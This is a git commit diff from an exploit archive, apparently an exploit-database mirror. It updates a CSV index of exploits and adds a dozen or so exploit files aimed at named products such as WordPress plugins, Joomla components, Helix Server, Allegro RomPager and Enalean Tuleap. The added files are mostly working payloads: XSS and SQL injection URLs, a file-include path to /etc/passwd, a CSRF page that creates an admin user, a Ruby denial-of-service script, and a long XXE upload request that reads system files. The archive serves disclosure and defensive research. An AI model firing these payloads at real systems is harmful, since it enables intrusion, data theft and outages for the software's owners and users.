Updated 10_30_2014
This commit is contained in:
parent
1709d70e04
commit
61f891edbd
21 changed files with 1592 additions and 1 deletions
22
files.csv
22
files.csv
|
@ -31573,7 +31573,7 @@ id,file,description,date,author,platform,type,port
|
|||
35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal Vulnerability",2010-12-06,Pr0T3cT10n,windows,remote,0
|
||||
35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion (RFI)",2014-10-25,"Parvinder Bhasin",php,webapps,0
|
||||
35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution ""Sandworm"" Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0
|
||||
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Remote File Inclusion",2014-10-25,"Mauricio Correa",hardware,webapps,0
|
||||
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"Mauricio Correa",hardware,webapps,0
|
||||
35057,platforms/php/webapps/35057.py,"Creative Contact Form (Wordpress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
|
||||
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
|
||||
35059,platforms/ios/webapps/35059.txt,"File Manager 4.2.10 iOS - Code Execution Vulnerability",2014-10-25,Vulnerability-Lab,ios,webapps,0
|
||||
|
@ -31594,9 +31594,29 @@ id,file,description,date,author,platform,type,port
|
|||
35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 (.wav) - Buffer Overflow",2014-10-27,metacom,windows,local,0
|
||||
35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0
|
||||
35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383
|
||||
35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0
|
||||
35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,metasploit,unix,remote,80
|
||||
35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation Vulnerability",2014-10-27,"Brandon Perry",jsp,webapps,8585
|
||||
35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80
|
||||
35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0
|
||||
35082,platforms/ios/webapps/35082.txt,"WebDisk+ 2.1 iOS - Code Execution Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,1861
|
||||
35083,platforms/ios/webapps/35083.txt,"Folder Plus 2.5.1 iOS - Persistent XSS Vulnerability",2014-10-27,Vulnerability-Lab,ios,webapps,0
|
||||
35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter Cross Site Scripting Vulnerability",2010-12-07,"John Leitch",php,webapps,0
|
||||
35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross Site Scripting Vulnerability",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 UPnP HTTP Request Remote Denial of Service Vulnerability.",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0
|
||||
35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 (stable) 'admin1.template.php' Local and Remote File Include Vulnerabilities",2010-12-09,"Marcin Ressel",php,webapps,0
|
||||
35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection Vulnerability",2010-12-09,jos_ali_joe,php,webapps,0
|
||||
35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection Vulnerability",2010-12-09,FL0RiX,php,webapps,0
|
||||
35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection Vulnerability",2010-12-10,FL0RiX,php,webapps,0
|
||||
35091,platforms/php/webapps/35091.txt,"ManageEngine EventLog Analyzer 6.1 Multiple Cross Site Scripting Vulnerabilities",2010-12-10,"Rob Kraus",php,webapps,0
|
||||
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross Site Request Forgery Vulnerability",2010-12-10,"John Leitch",multiple,remote,0
|
||||
35093,platforms/cgi/webapps/35093.txt,"BizDir v.05.10 'f_srch' Parameter Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
|
||||
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross Site Scripting Vulnerability",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
|
||||
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
|
||||
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 'com_redirect' Local File Include Vulnerability",2010-12-13,jos_ali_joe,php,webapps,0
|
||||
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
|
||||
35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80
|
||||
35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80
|
||||
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
|
||||
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/cgi/webapps/35085.txt
Executable file
9
platforms/cgi/webapps/35085.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45303/info
|
||||
|
||||
WWWThread is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
WWWThread 5.0.8 Pro is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cgi-bin/forum/showflat.pl?Cat=&Board=forum&Number=111&page=0&view="<XSS>expanded&sb=1&part=all&vc=1
|
9
platforms/cgi/webapps/35093.txt
Executable file
9
platforms/cgi/webapps/35093.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45342/info
|
||||
|
||||
BizDir is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
BizDir v.05.10 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/cgi-bin/bizdir/bizdir.cgi?f_mode=srch& f_srch=<XSS inj>&f_srch_mode=SOME&f_start_at=1
|
13
platforms/linux/remote/35095.txt
Executable file
13
platforms/linux/remote/35095.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/45353/info
|
||||
|
||||
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities.
|
||||
|
||||
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
|
||||
|
||||
This issue is fixed in:
|
||||
|
||||
Firefox 3.6.13
|
||||
Firefox 3.5.16
|
||||
SeaMonkey 2.0.11
|
||||
|
||||
x-mac-farsi exploit: <meta charset="x-mac-farsi">?script ?alert(1)//?/script ?
|
24
platforms/multiple/dos/35086.rb
Executable file
24
platforms/multiple/dos/35086.rb
Executable file
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/45309/info
|
||||
|
||||
Allegro RomPager is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Successfully exploiting this issue allows remote attackers to reboot affected devices, resulting in a denial-of-service condition.
|
||||
|
||||
require 'net/https'
|
||||
|
||||
url = URI.parse("http://IP/")
|
||||
data = nil
|
||||
headers = {
|
||||
"Host" => "IP",
|
||||
"Authorization" => "Basic
|
||||
|
||||
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
|
||||
}
|
||||
|
||||
res = Net::HTTP.start(url.host, url.port) do |http|
|
||||
http.use_ssl = false
|
||||
http.send_request("GET", url.path, data, headers)
|
||||
end
|
||||
|
||||
puts res.body
|
||||
|
13
platforms/multiple/remote/35092.html
Executable file
13
platforms/multiple/remote/35092.html
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/45340/info
|
||||
|
||||
Helix Server is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit this issue to perform unauthorized actions by enticing a logged-in user to visit a malicious site.
|
||||
|
||||
Helix Server 14.0.1.571 is vulnerable; other versions may also be affected.
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<img src="http://www.example.com/admin/auth.adduser.html?respage=config_results.nc.html&name=new_admin&pass=Password1&realm=TESTBOX.AdminRealm" />
|
||||
</body>
|
||||
</html>
|
9
platforms/php/webapps/35084.txt
Executable file
9
platforms/php/webapps/35084.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45294/info
|
||||
|
||||
The Twitter Feed Plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
Twitter Feed 0.3.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E
|
9
platforms/php/webapps/35087.txt
Executable file
9
platforms/php/webapps/35087.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45312/info
|
||||
|
||||
The 'net2ftp' program is prone to a local file-include vulnerability and a remote file-include vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these issues to obtain sensitive information; other attacks are also possible.
|
||||
|
||||
net2ftp 0.98 stable is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil
|
7
platforms/php/webapps/35088.txt
Executable file
7
platforms/php/webapps/35088.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45328/info
|
||||
|
||||
PHP State is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
|
||||
|
||||
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe -
|
7
platforms/php/webapps/35089.txt
Executable file
7
platforms/php/webapps/35089.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45329/info
|
||||
|
||||
Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi]
|
7
platforms/php/webapps/35090.txt
Executable file
7
platforms/php/webapps/35090.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/45333/info
|
||||
|
||||
JExtensions Property Finder is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT]
|
18
platforms/php/webapps/35091.txt
Executable file
18
platforms/php/webapps/35091.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/45334/info
|
||||
|
||||
ManageEngine EventLog Analyzer is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
ManageEngine EventLog Analyzer 6.1 is vulnerable; other versions may also be affected.
|
||||
|
||||
https://www.example.com/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E
|
||||
|
||||
|
||||
https://www.example.com/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
|
||||
|
||||
https://www.example.com/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
||||
|
||||
|
||||
https://www.example.com/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
9
platforms/php/webapps/35094.txt
Executable file
9
platforms/php/webapps/35094.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45343/info
|
||||
|
||||
slickMsg is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
slickMsg 0.7-alpha is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E
|
8
platforms/php/webapps/35096.txt
Executable file
8
platforms/php/webapps/35096.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/45356/info
|
||||
|
||||
The 'com_mailto' component for Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
" style="xss:expression(alert(document.cookie))
|
||||
In fields: E-mail to, Sender, Your E-mail, Subject.
|
9
platforms/php/webapps/35097.txt
Executable file
9
platforms/php/webapps/35097.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/45364/info
|
||||
|
||||
The 'com_redirect' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
|
||||
|
||||
Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00
|
36
platforms/php/webapps/35098.txt
Executable file
36
platforms/php/webapps/35098.txt
Executable file
|
@ -0,0 +1,36 @@
|
|||
Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
|
||||
CVE: CVE-2014-7176
|
||||
Vendor: Enalean
|
||||
Product: Tuleap
|
||||
Affected version: 7.4.99.5 and earlier
|
||||
Fixed version: 7.5
|
||||
Reported by: Jerzy Kramarz
|
||||
|
||||
Details:
|
||||
|
||||
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
|
||||
|
||||
|
||||
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
|
||||
Host: 192.168.56.108
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://192.168.56.108/plugins/docman/?group_id=100
|
||||
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
|
||||
Connection: keep-alive
|
||||
|
||||
|
||||
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
|
||||
|
||||
|
||||
Further details at:
|
||||
|
||||
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
|
||||
|
||||
Copyright:
|
||||
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
|
||||
|
||||
Disclaimer:
|
||||
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
|
888
platforms/php/webapps/35099.txt
Executable file
888
platforms/php/webapps/35099.txt
Executable file
|
@ -0,0 +1,888 @@
|
|||
Vulnerability title: Tuleap <= 7.2 External XML Entity Injection in Enalean Tuleap
|
||||
CVE: CVE-2014-7177
|
||||
Vendor: Enalean
|
||||
Product: Tuleap
|
||||
Affected version: 7.2 and earlier
|
||||
Fixed version: 7.4.99.5
|
||||
Reported by: Jerzy Kramarz
|
||||
|
||||
Details:
|
||||
|
||||
A multiple XML External Entity Injection has been found and confirmed within the software as an authenticated user. Successful attack could allow an authenticated attacker to access local system files. The following example vectors can be used as PoC to confirm the vulnerability.
|
||||
|
||||
Vulnerability 1:
|
||||
|
||||
1) Upload a XXE using the following request:
|
||||
|
||||
|
||||
POST /plugins/tracker/?group_id=102&func=create HTTP/1.1
|
||||
Host: [ip]
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: https://[ip]/plugins/tracker/?group_id=102&func=create
|
||||
Cookie: PHPSESSID=ujjrs6r6mssqn5gd5j83cmner4; TULEAP_session_hash=4a8075ce16e338b4015405cfa2816319
|
||||
Connection: keep-alive
|
||||
Content-Type: multipart/form-data; boundary=---------------------------25777276834778
|
||||
Content-Length: 10561
|
||||
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="group_id"
|
||||
|
||||
102
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="func"
|
||||
|
||||
docreate
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="group_id_template"
|
||||
|
||||
100
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="tracker_new_prjname"
|
||||
|
||||
Commencez à taper
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="create_mode"
|
||||
|
||||
xml
|
||||
-----------------------------25777276834778
|
||||
Content-Disposition: form-data; name="tracker_new_xml_file"; filename="xee.xml"
|
||||
Content-Type: text/xml
|
||||
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE str [<!ENTITY xxe SYSTEM "/etc/passwd">]>
|
||||
<tracker instantiate_for_new_projects="0">
|
||||
<name>123&xxe;</name>
|
||||
<item_name>e123&xxe;</item_name>
|
||||
<description>123&xxe;</description>
|
||||
<cannedResponses/>
|
||||
<formElements>
|
||||
<formElement type="file" ID="F1" rank="0" use_it="0">
|
||||
<name>attachment</name>
|
||||
<label>Attachments</label>
|
||||
</formElement>
|
||||
<formElement type="text" ID="F2" rank="2" use_it="0">
|
||||
<name>details</name>
|
||||
<label>Original Submission</label>
|
||||
<description>A full description of the artifact&xxe;</description>
|
||||
<properties rows="7" cols="60"/>
|
||||
</formElement>
|
||||
<formElement type="string" ID="F3" rank="4" use_it="0" required="1">
|
||||
<name>summary</name>
|
||||
<label>Summary</label>
|
||||
<description>One line description of the artifact&xxe;</description>
|
||||
<properties maxchars="150" size="60"/>
|
||||
</formElement>
|
||||
<formElement type="tbl" ID="F4" rank="6" use_it="0">
|
||||
<name>cc</name>
|
||||
<label>CC</label>
|
||||
<properties hint="Type in a search term"/>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F7" rank="12" use_it="0">
|
||||
<name>status_id</name>
|
||||
<label>Status</label>
|
||||
<description>Artifact Status</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F7-V0" label="Open">
|
||||
<description>The artifact has been submitted&xxe;</description>
|
||||
</item>
|
||||
<item ID="F7-V1" label="Closed">
|
||||
<description>The artifact is no longer active. See the Resolution field for details on how it was resolved.&xxe;</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F8" rank="14" use_it="0">
|
||||
<name>assigned_to</name>
|
||||
<label>Assigned to</label>
|
||||
<description>Who is in charge of solving the artifact&xxe;</description>
|
||||
<bind type="users">
|
||||
<items>
|
||||
<item label="group_members"/>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F11" rank="20" use_it="0">
|
||||
<name>category_id</name>
|
||||
<label>Category</label>
|
||||
<description>Generally correspond to high level modules or functionalities of your software (e.g. User interface, Configuration Manager, Scheduler, Memory Manager...)</description>
|
||||
<bind type="static" is_rank_alpha="0"/>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F12" rank="22" use_it="0">
|
||||
<name>severity</name>
|
||||
<label>Priority</label>
|
||||
<description>How quickly the artifact must be completed</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F12-V0" label="1 - Lowest"/>
|
||||
<item ID="F12-V1" label="2"/>
|
||||
<item ID="F12-V2" label="3"/>
|
||||
<item ID="F12-V3" label="4"/>
|
||||
<item ID="F12-V4" label="5 - Medium"/>
|
||||
<item ID="F12-V5" label="6"/>
|
||||
<item ID="F12-V6" label="7"/>
|
||||
<item ID="F12-V7" label="8"/>
|
||||
<item ID="F12-V8" label="9 - Highest"/>
|
||||
</items>
|
||||
<decorators>
|
||||
<decorator REF="F12-V0" r="255" g="255" b="204"/>
|
||||
<decorator REF="F12-V1" r="255" g="255" b="102"/>
|
||||
<decorator REF="F12-V2" r="255" g="204" b="0"/>
|
||||
<decorator REF="F12-V3" r="255" g="153" b="0"/>
|
||||
<decorator REF="F12-V4" r="255" g="102" b="0"/>
|
||||
<decorator REF="F12-V5" r="255" g="51" b="0"/>
|
||||
<decorator REF="F12-V6" r="204" g="51" b="0"/>
|
||||
<decorator REF="F12-V7" r="153" g="0" b="0"/>
|
||||
<decorator REF="F12-V8" r="51" g="0" b="0"/>
|
||||
</decorators>
|
||||
</bind>
|
||||
</formElement>
|
||||
<formElement type="sb" ID="F13" rank="24" use_it="0">
|
||||
<name>stage&xxe;</name>
|
||||
<label>Stage&xxe;</label>
|
||||
<description>Stage in the life cycle of the artifact&xxe;</description>
|
||||
<bind type="static" is_rank_alpha="0">
|
||||
<items>
|
||||
<item ID="F13-V0" label="New">
|
||||
<description>The artifact has just been submitted</description>
|
||||
</item>
|
||||
<item ID="F13-V1" label="Analyzed">
|
||||
<description>The cause of the artifact has been identified and documented</description>
|
||||
</item>
|
||||
<item ID="F13-V2" label="Accepted">
|
||||
<description>The artifact will be worked on.</description>
|
||||
</item>
|
||||
<item ID="F13-V3" label="Under Implementation">
|
||||
<description>The artifact is being worked on.</description>
|
||||
</item>
|
||||
<item ID="F13-V4" label="Ready for Review">
|
||||
<description>Updated/Created non-software work product (e.g. documentation) is ready for review and approval.</description>
|
||||
</item>
|
||||
<item ID="F13-V5" label="Ready for Test">
|
||||
<description>Updated/Created software is ready to be included in the next build</description>
|
||||
</item>
|
||||
<item ID="F13-V6" label="In Test">
|
||||
<description>Updated/Created software is in the build and is ready to enter the test phase</description>
|
||||
</item>
|
||||
<item ID="F13-V7" label="Approved">
|
||||
<description>The artifact fix has been succesfully tested. It is approved and awaiting release.</description>
|
||||
</item>
|
||||
<item ID="F13-V8" label="Declined">
|
||||
<description>The artifact was not accepted.</description>
|
||||
</item>
|
||||
<item ID="F13-V9" label="Done">
|
||||
<description>The artifact is closed.</description>
|
||||
</item>
|
||||
</items>
|
||||
</bind>
|
||||
</formElement>
|
||||
</formElements>
|
||||
<semantics>
|
||||
<semantic type="tooltip"/>
|
||||
</semantics>
|
||||
<reports>
|
||||
<report is_default="0">
|
||||
<name>Default</name>
|
||||
<description>The system default artifact report</description>
|
||||
<criterias/>
|
||||
<renderers>
|
||||
<renderer type="table" rank="0" chunksz="15" multisort="15">
|
||||
<name>Results</name>
|
||||
<columns/>
|
||||
</renderer>
|
||||
<renderer type="plugin_graphontrackersv5" rank="1">
|
||||
<name>Default</name>
|
||||
<description>Graphic Report By Default For Support Requests</description>
|
||||
<charts/>
|
||||
</renderer>
|
||||
</renderers>
|
||||
</report>
|
||||
</reports>
|
||||
<workflow/>
|
||||
<permissions>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F1" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F2" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F3" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F4" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F7" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_REGISTERED" type="PLUGIN_TRACKER_FIELD_SUBMIT"/>
|
||||
<permission scope="field" REF="F8" ugroup="UGROUP_PROJECT_MEMBERS" type="PLUGIN_TRACKER_FIELD_UPDATE"/>
|
||||
<permission scope="field" REF="F11" ugroup="UGROUP_ANONYMOUS" type="PLUGIN_TRACKER_FIELD_READ"/>
|
||||
